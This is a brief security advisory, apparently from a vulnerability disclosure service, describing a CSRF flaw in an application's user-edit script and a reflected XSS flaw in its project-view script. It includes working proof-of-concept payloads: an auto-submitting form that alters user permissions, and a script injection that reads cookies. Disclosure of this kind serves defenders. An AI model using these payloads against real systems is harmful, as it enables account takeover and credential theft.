HTB22916 & HTB22917
The vulnerability exists due to failure in the 'users/edituser.php' script to properly verify the source of HTTP request. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: <form action='http://host/users/edituser.php?id=USERID&action=update' method='post' name='main'><input type='hidden' name='un' value='test'><input type='hidden' name='unOld' value='test'><input type='hidden' name='fn' value='test'><input type='hidden' name='tit' value='test'><input type='hidden' name='em' value='email (at) example (dot) com [email concealed]'><input type='hidden' name='pw' value=''><input type='hidden' name='pwa' value=''><input type='hidden' name='perm' value='5'><input type='hidden' name='Save' value='Save'></form><script>document.main.submit();</script> User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the 'projects/viewprojectsite.php' script to properly sanitize user-supplied input. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. Attacker can use browser to exploit this vulnerability. The following PoC is available: http://host/projects/viewprojectsite.php?id=PROJECTID&action=add&task=1&title=<script>alert(document.cookie)</script>